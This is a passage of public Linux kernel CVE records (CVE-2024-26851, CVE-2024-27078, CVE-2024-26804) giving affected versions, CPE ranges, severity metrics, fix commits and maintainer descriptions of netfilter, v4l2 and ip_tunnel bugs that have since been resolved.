"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "014a807f1cc9c9d5173c1cd935835553b00d211c",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "80ee5054435a11c87c9a4f30f1ff750080c96416",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "767146637efc528b5e3d31297df115e85a2fd362",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_conntrack_h323_asn1.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.17"
},
{
"lessThan": "2.6.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.310",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.272",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.82",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.310",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.272",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.82",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.22",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.10",
"versionStartIncluding": "2.6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_h323: Add protection for bmp length out of range\n\nUBSAN load reports an exception of BRK#5515 SHIFT_ISSUE:Bitwise shifts\nthat are out of bounds for their data type.\n\nvmlinux get_bitmap(b=75) + 712\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:0\u003e\nvmlinux decode_seq(bs=0xFFFFFFD008037000, f=0xFFFFFFD008037018, level=134443100) + 1956\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:592\u003e\nvmlinux decode_choice(base=0xFFFFFFD0080370F0, level=23843636) + 1216\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:814\u003e\nvmlinux decode_seq(f=0xFFFFFFD0080371A8, level=134443500) + 812\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:576\u003e\nvmlinux decode_choice(base=0xFFFFFFD008037280, level=0) + 1216\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:814\u003e\nvmlinux DecodeRasMessage() + 304\n\u003cnet/netfilter/nf_conntrack_h323_asn1.c:833\u003e\nvmlinux ras_help() + 684\n\u003cnet/netfilter/nf_conntrack_h323_main.c:1728\u003e\nvmlinux nf_confirm() + 188\n\u003cnet/netfilter/nf_conntrack_proto.c:137\u003e\n\nDue to abnormal data in skb-\u003edata, the extension bitmap length\nexceeds 32 when decoding ras message then uses the length to make\na shift operation. It will change into negative after several loop.\nUBSAN load could detect a negative shift as an undefined behaviour\nand reports exception.\nSo we add the protection to avoid the length exceeding 32. Or else\nit will return out of range error and stop decoding."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:57.098Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/98db42191329c679f4ca52bec0b319689e1ad8cb"
},
{
"url": "https://git.kernel.org/stable/c/4bafcc43baf7bcf93566394dbd15726b5b456b7a"
},
{
"url": "https://git.kernel.org/stable/c/ccd1108b16ab572d9bf635586b0925635dbd6bbc"
},
{
"url": "https://git.kernel.org/stable/c/b3c0f553820516ad4b62a9390ecd28d6f73a7b13"
},
{
"url": "https://git.kernel.org/stable/c/39001e3c42000e7c2038717af0d33c32319ad591"
},
{
"url": "https://git.kernel.org/stable/c/014a807f1cc9c9d5173c1cd935835553b00d211c"
},
{
"url": "https://git.kernel.org/stable/c/80ee5054435a11c87c9a4f30f1ff750080c96416"
},
{
"url": "https://git.kernel.org/stable/c/767146637efc528b5e3d31297df115e85a2fd362"
}
],
"title": "netfilter: nf_conntrack_h323: Add protection for bmp length out of range",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26851",
"datePublished": "2024-04-17T10:17:15.298Z",
"dateReserved": "2024-02-19T14:20:24.183Z",
"dateUpdated": "2025-05-04T08:57:57.098Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27078 (GCVE-0-2024-27078)
Vulnerability from cvelistv5
Published
2024-05-01 13:04
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-tpg: fix some memleaks in tpg_alloc
In tpg_alloc, resources should be deallocated in each and every
error-handling paths, since they are allocated in for statements.
Otherwise there would be memleaks because tpg_free is called only when
tpg_alloc return 0.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 63881df94d3ecbb0deafa0b77da62ff2f32961c4 Version: 63881df94d3ecbb0deafa0b77da62ff2f32961c4 Version: 63881df94d3ecbb0deafa0b77da62ff2f32961c4 Version: 63881df94d3ecbb0deafa0b77da62ff2f32961c4 Version: 63881df94d3ecbb0deafa0b77da62ff2f32961c4 Version: 63881df94d3ecbb0deafa0b77da62ff2f32961c4 Version: 63881df94d3ecbb0deafa0b77da62ff2f32961c4 Version: 63881df94d3ecbb0deafa0b77da62ff2f32961c4 Version: 63881df94d3ecbb0deafa0b77da62ff2f32961c4 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27078",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T15:32:05.412221Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T15:32:19.858Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:27:58.532Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0de691ff547d86dd54c24b40a81f9c925df8dd77"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8269ab16415f2065cd792c49b0475543936cbd79"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/94303a06e1852a366e9671fff46d19459f88cb28"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/770a57922ce36a8476c43f7400b6501c554ea511"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6bf5c2fade8ed53b2d26fa9875e5b04f36c7145d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c86c772fef06f5d7a66151bac42366825db0941"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/31096da07933598da8522c54bd007376fb152a09"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/622b1cf38521569869c8f7b9fbe9e4f1a289add7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8cf9c5051076e0eb958f4361d50d8b0c3ee6691c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/common/v4l2-tpg/v4l2-tpg-core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0de691ff547d86dd54c24b40a81f9c925df8dd77",
"status": "affected",
"version": "63881df94d3ecbb0deafa0b77da62ff2f32961c4",
"versionType": "git"
},
{
"lessThan": "8269ab16415f2065cd792c49b0475543936cbd79",
"status": "affected",
"version": "63881df94d3ecbb0deafa0b77da62ff2f32961c4",
"versionType": "git"
},
{
"lessThan": "94303a06e1852a366e9671fff46d19459f88cb28",
"status": "affected",
"version": "63881df94d3ecbb0deafa0b77da62ff2f32961c4",
"versionType": "git"
},
{
"lessThan": "770a57922ce36a8476c43f7400b6501c554ea511",
"status": "affected",
"version": "63881df94d3ecbb0deafa0b77da62ff2f32961c4",
"versionType": "git"
},
{
"lessThan": "6bf5c2fade8ed53b2d26fa9875e5b04f36c7145d",
"status": "affected",
"version": "63881df94d3ecbb0deafa0b77da62ff2f32961c4",
"versionType": "git"
},
{
"lessThan": "4c86c772fef06f5d7a66151bac42366825db0941",
"status": "affected",
"version": "63881df94d3ecbb0deafa0b77da62ff2f32961c4",
"versionType": "git"
},
{
"lessThan": "31096da07933598da8522c54bd007376fb152a09",
"status": "affected",
"version": "63881df94d3ecbb0deafa0b77da62ff2f32961c4",
"versionType": "git"
},
{
"lessThan": "622b1cf38521569869c8f7b9fbe9e4f1a289add7",
"status": "affected",
"version": "63881df94d3ecbb0deafa0b77da62ff2f32961c4",
"versionType": "git"
},
{
"lessThan": "8cf9c5051076e0eb958f4361d50d8b0c3ee6691c",
"status": "affected",
"version": "63881df94d3ecbb0deafa0b77da62ff2f32961c4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/common/v4l2-tpg/v4l2-tpg-core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.18"
},
{
"lessThan": "3.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: v4l2-tpg: fix some memleaks in tpg_alloc\n\nIn tpg_alloc, resources should be deallocated in each and every\nerror-handling paths, since they are allocated in for statements.\nOtherwise there would be memleaks because tpg_free is called only when\ntpg_alloc return 0."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:50.095Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0de691ff547d86dd54c24b40a81f9c925df8dd77"
},
{
"url": "https://git.kernel.org/stable/c/8269ab16415f2065cd792c49b0475543936cbd79"
},
{
"url": "https://git.kernel.org/stable/c/94303a06e1852a366e9671fff46d19459f88cb28"
},
{
"url": "https://git.kernel.org/stable/c/770a57922ce36a8476c43f7400b6501c554ea511"
},
{
"url": "https://git.kernel.org/stable/c/6bf5c2fade8ed53b2d26fa9875e5b04f36c7145d"
},
{
"url": "https://git.kernel.org/stable/c/4c86c772fef06f5d7a66151bac42366825db0941"
},
{
"url": "https://git.kernel.org/stable/c/31096da07933598da8522c54bd007376fb152a09"
},
{
"url": "https://git.kernel.org/stable/c/622b1cf38521569869c8f7b9fbe9e4f1a289add7"
},
{
"url": "https://git.kernel.org/stable/c/8cf9c5051076e0eb958f4361d50d8b0c3ee6691c"
}
],
"title": "media: v4l2-tpg: fix some memleaks in tpg_alloc",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27078",
"datePublished": "2024-05-01T13:04:54.979Z",
"dateReserved": "2024-02-19T14:20:24.217Z",
"dateUpdated": "2025-05-04T09:03:50.095Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26804 (GCVE-0-2024-26804)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: ip_tunnel: prevent perpetual headroom growth
syzkaller triggered following kasan splat:
BUG: KASAN: use-after-free in __skb_flow_dissect+0x19d1/0x7a50 net/core/flow_dissector.c:1170
Read of size 1 at addr ffff88812fb4000e by task syz-executor183/5191
[..]
kasan_report+0xda/0x110 mm/kasan/report.c:588
__skb_flow_dissect+0x19d1/0x7a50 net/core/flow_dissector.c:1170
skb_flow_dissect_flow_keys include/linux/skbuff.h:1514 [inline]
___skb_get_hash net/core/flow_dissector.c:1791 [inline]
__skb_get_hash+0xc7/0x540 net/core/flow_dissector.c:1856
skb_get_hash include/linux/skbuff.h:1556 [inline]
ip_tunnel_xmit+0x1855/0x33c0 net/ipv4/ip_tunnel.c:748
ipip_tunnel_xmit+0x3cc/0x4e0 net/ipv4/ipip.c:308
__netdev_start_xmit include/linux/netdevice.h:4940 [inline]
netdev_start_xmit include/linux/netdevice.h:4954 [inline]
xmit_one net/core/dev.c:3548 [inline]
dev_hard_start_xmit+0x13d/0x6d0 net/core/dev.c:3564
__dev_queue_xmit+0x7c1/0x3d60 net/core/dev.c:4349
dev_queue_xmit include/linux/netdevice.h:3134 [inline]
neigh_connected_output+0x42c/0x5d0 net/core/neighbour.c:1592
...
ip_finish_output2+0x833/0x2550 net/ipv4/ip_output.c:235
ip_finish_output+0x31/0x310 net/ipv4/ip_output.c:323
..
iptunnel_xmit+0x5b4/0x9b0 net/ipv4/ip_tunnel_core.c:82
ip_tunnel_xmit+0x1dbc/0x33c0 net/ipv4/ip_tunnel.c:831
ipgre_xmit+0x4a1/0x980 net/ipv4/ip_gre.c:665
__netdev_start_xmit include/linux/netdevice.h:4940 [inline]
netdev_start_xmit include/linux/netdevice.h:4954 [inline]
xmit_one net/core/dev.c:3548 [inline]
dev_hard_start_xmit+0x13d/0x6d0 net/core/dev.c:3564
...
The splat occurs because skb->data points past skb->head allocated area.
This is because neigh layer does:
__skb_pull(skb, skb_network_offset(skb));
... but skb_network_offset() returns a negative offset and __skb_pull()
arg is unsigned. IOW, we skb->data gets "adjusted" by a huge value.
The negative value is returned because skb->head and skb->data distance is
more than 64k and skb->network_header (u16) has wrapped around.
The bug is in the ip_tunnel infrastructure, which can cause
dev->needed_headroom to increment ad infinitum.
The syzkaller reproducer consists of packets getting routed via a gre
tunnel, and route of gre encapsulated packets pointing at another (ipip)
tunnel. The ipip encapsulation finds gre0 as next output device.
This results in the following pattern:
1). First packet is to be sent out via gre0.
Route lookup found an output device, ipip0.
2).
ip_tunnel_xmit for gre0 bumps gre0->needed_headroom based on the future
output device, rt.dev->needed_headroom (ipip0).
3).
ip output / start_xmit moves skb on to ipip0. which runs the same
code path again (xmit recursion).
4).
Routing step for the post-gre0-encap packet finds gre0 as output device
to use for ipip0 encapsulated packet.
tunl0->needed_headroom is then incremented based on the (already bumped)
gre0 device headroom.
This repeats for every future packet:
gre0->needed_headroom gets inflated because previous packets' ipip0 step
incremented rt->dev (gre0) headroom, and ipip0 incremented because gre0
needed_headroom was increased.
For each subsequent packet, gre/ipip0->needed_headroom grows until
post-expand-head reallocations result in a skb->head/data distance of
more than 64k.
Once that happens, skb->network_header (u16) wraps around when
pskb_expand_head tries to make sure that skb_network_offset() is unchanged
after the headroom expansion/reallocation.
After this skb_network_offset(skb) returns a different (and negative)
result post headroom expansion.
The next trip to neigh layer (or anything else that would __skb_pull the
network header) makes skb->data point to a memory location outside
skb->head area.
v2: Cap the needed_headroom update to an arbitarily chosen upperlimit to
prevent perpetual increase instead of dropping the headroom increment
completely.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 243aad830e8a4cdda261626fbaeddde16b08d04a Version: 243aad830e8a4cdda261626fbaeddde16b08d04a Version: 243aad830e8a4cdda261626fbaeddde16b08d04a Version: 243aad830e8a4cdda261626fbaeddde16b08d04a Version: 243aad830e8a4cdda261626fbaeddde16b08d04a Version: 243aad830e8a4cdda261626fbaeddde16b08d04a Version: 243aad830e8a4cdda261626fbaeddde16b08d04a Version: 03017375b0122453e6dda833ff7bd4191915def5 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26804",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-12T16:26:17.359512Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-12T16:40:15.613Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.557Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f81e94d2dcd2397137edcb8b85f4c5bed5d22383"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e95350fe9db9d53c701075060ac8ac883b68aee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/afec0c5cd2ed71ca95a8b36a5e6d03333bf34282"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab63de24ebea36fe73ac7121738595d704b66d96"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0a1db40b23e8ff86dea2786c5ea1470bb23ecb9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/049d7989c67e8dd50f07a2096dbafdb41331fb9b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ae1e9922bbdbaeb9cfbe91085ab75927488ac0f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/ip_tunnel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f81e94d2dcd2397137edcb8b85f4c5bed5d22383",
"status": "affected",
"version": "243aad830e8a4cdda261626fbaeddde16b08d04a",
"versionType": "git"
},
{
"lessThan": "2e95350fe9db9d53c701075060ac8ac883b68aee",
"status": "affected",
"version": "243aad830e8a4cdda261626fbaeddde16b08d04a",
"versionType": "git"
},
{
"lessThan": "afec0c5cd2ed71ca95a8b36a5e6d03333bf34282",
"status": "affected",
"version": "243aad830e8a4cdda261626fbaeddde16b08d04a",
"versionType": "git"
},
{
"lessThan": "ab63de24ebea36fe73ac7121738595d704b66d96",
"status": "affected",
"version": "243aad830e8a4cdda261626fbaeddde16b08d04a",
"versionType": "git"
},
{
"lessThan": "a0a1db40b23e8ff86dea2786c5ea1470bb23ecb9",
"status": "affected",
"version": "243aad830e8a4cdda261626fbaeddde16b08d04a",
"versionType": "git"
},
{
"lessThan": "049d7989c67e8dd50f07a2096dbafdb41331fb9b",
"status": "affected",
"version": "243aad830e8a4cdda261626fbaeddde16b08d04a",
"versionType": "git"
},
{
"lessThan": "5ae1e9922bbdbaeb9cfbe91085ab75927488ac0f",
"status": "affected",
"version": "243aad830e8a4cdda261626fbaeddde16b08d04a",
"versionType": "git"
},
{
"status": "affected",
"version": "03017375b0122453e6dda833ff7bd4191915def5",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/ip_tunnel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.34"
},
{
"lessThan": "2.6.34",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "2.6.33.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ip_tunnel: prevent perpetual headroom growth\n\nsyzkaller triggered following kasan splat:\nBUG: KASAN: use-after-free in __skb_flow_dissect+0x19d1/0x7a50 net/core/flow_dissector.c:1170\nRead of size 1 at addr ffff88812fb4000e by task syz-executor183/5191\n[..]\n kasan_report+0xda/0x110 mm/kasan/report.c:588\n __skb_flow_dissect+0x19d1/0x7a50 net/core/flow_dissector.c:1170\n skb_flow_dissect_flow_keys include/linux/skbuff.h:1514 [inline]\n ___skb_get_hash net/core/flow_dissector.c:1791 [inline]\n __skb_get_hash+0xc7/0x540 net/core/flow_dissector.c:1856\n skb_get_hash include/linux/skbuff.h:1556 [inline]\n ip_tunnel_xmit+0x1855/0x33c0 net/ipv4/ip_tunnel.c:748\n ipip_tunnel_xmit+0x3cc/0x4e0 net/ipv4/ipip.c:308\n __netdev_start_xmit include/linux/netdevice.h:4940 [inline]\n netdev_start_xmit include/linux/netdevice.h:4954 [inline]\n xmit_one net/core/dev.c:3548 [inline]\n dev_hard_start_xmit+0x13d/0x6d0 net/core/dev.c:3564\n __dev_queue_xmit+0x7c1/0x3d60 net/core/dev.c:4349\n dev_queue_xmit include/linux/netdevice.h:3134 [inline]\n neigh_connected_output+0x42c/0x5d0 net/core/neighbour.c:1592\n ...\n ip_finish_output2+0x833/0x2550 net/ipv4/ip_output.c:235\n ip_finish_output+0x31/0x310 net/ipv4/ip_output.c:323\n ..\n iptunnel_xmit+0x5b4/0x9b0 net/ipv4/ip_tunnel_core.c:82\n ip_tunnel_xmit+0x1dbc/0x33c0 net/ipv4/ip_tunnel.c:831\n ipgre_xmit+0x4a1/0x980 net/ipv4/ip_gre.c:665\n 